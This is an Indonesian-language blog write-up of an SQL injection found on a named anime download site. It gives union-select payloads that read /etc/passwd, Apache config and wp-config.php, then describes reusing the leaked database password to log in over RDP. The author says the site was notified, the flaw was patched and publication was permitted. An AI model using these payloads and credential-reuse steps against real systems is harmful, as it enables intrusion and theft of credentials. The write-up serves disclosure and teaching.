SQL Injection Into XRDP Account Take Over

SQL Injection Into XRDP Account Take Over

Well mungkin judulnya agak click bait sql injection sendiri tidak bisa melakukan injeksi sampai ke RDP Account Take Over xD

Sebenarnya tujuan awal cuman ingin download anime di moesubs.com sih, namu saat membuka webnya ada url yang sangat pantas untuk dicurigai yaitu
https://moesubs.com/?hal=dlrilisan&id=591
yaudah deh coba cek pake ' dan hasilnya web tersebut error, setelah error melakukan balancing pakai comment SQL --+- hasilnya web balik jadi normal lagi, oke lanjut ke order by

id=591'order by 1--+- //aman
id=591'order by 2--+- //aman
----------ordering hell-----------
id=591'order by 13--+- //aman
id=591'order by 14--+- //error

berarti jumlah kolom ada 13 karena web menampilkan error saat query SQL menjalankan order by kolom 14, lanjut ke union select

id=591'union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --+-

angka magic belum keluar nih, yaudah kasih false statement dengan memberikan . (dot) atau – (dash)

id=.591'union select 1,2,3,4,5,6,7,8,9,10,11,12,13 --+-

dan muncullah angka magic tersebut, tanpa basa-basi langsung DIOS cek user dan versi mysql

id=.591'union select 1,version(),3,4,5,user(),7,8,9,10,11,12,13 --+-

terkejut melihat user yang dipake adalah root@localhost, langsung load file /etc/passwd

id=.591’union select 1,version(),3,4,5,load_file('/etc/passwd'),7,8,9,10,11,12,13 --+-

etc passwd content
langsung coba lagi lebih jauh yaitu shell uploading, namun sepertinya 100% gagal karena user www-data tidak memiliki own ke folder yang bisa diakses melalui port 80

yaudah recon-recon lagi, coba cek ke file config /etc/httpd/conf/httpd.conf menemukan beberapa infomasi yang bisa digali lebih dalam lagi yaitu lokasi direktori web dan sebuah IP, skip dulu simpan saja dulu,

dan melakukan DIOS di SQL injection tadi, lalu menemukan beberapa table db dari wordpress (terlihat dari prefix wp_),

kembali lagi ke file config httpd.conf mencoba akses semua url dan ip yang ada pada config httpd untuk mengecek direktori manakah yang menggunakan cms wordpress dan menyambi port scanning pada IP tadi.

Setelah satu persatu di akeses, ada 1 yang terlihat sebagai wordpress (terbukti pada ekstensi wappalyzer dan file-file umum wordpress seperti wp-login.php, /wp-includes/, dll) lalu akses config wordpress tersebut melalui load_file

id=591’union select 1,version(),3,4,5,load_file(/dir/dir/dir/wp-config.php),7,8,9,10,11,12,13 --+-

dan terlihatlah config wordpress tadi

httpd wordpress config

wah user root, coba ah konek pakai adminer, dan hasilnya nihil (diblok).

Kembali lagi ke port scanning dan menemukan port 3389, konek pakai rdesktop, login satu per satu user yang ada di /etc/passwd lalu password menggunakan db password yang telah ditemukan di atas, coba satu persatu dan masuk nih :3
rdesktop login
rdp access

coba sudo, ehhh ternyata ga ada sudo >.< lupa kalo centos yaudah segini udah cukup, lalu balik ke moesubs.com cari kontak yang bisa dihubungi (ada email), laporkan, kirim lagi engga sampai 4 jam udah dibales, dan tanggapannya juga baik :)

bug udah di patch, password udah diganti, config udah dibenerin, ijin untuk publikasi bug dikasih, reward ? lumayan buat jatah ngopi, kalo di hackerone / bugcrowd pasti besar nih wkwkwkwkwk.

Dan pada akhirnya gajadi download anime xD

Reference: SQL Injection Load File and Into Outfile

Special Thanks to:

whois moesubs.com  
# Surabaya Hacker Link  
# p4c3n0g3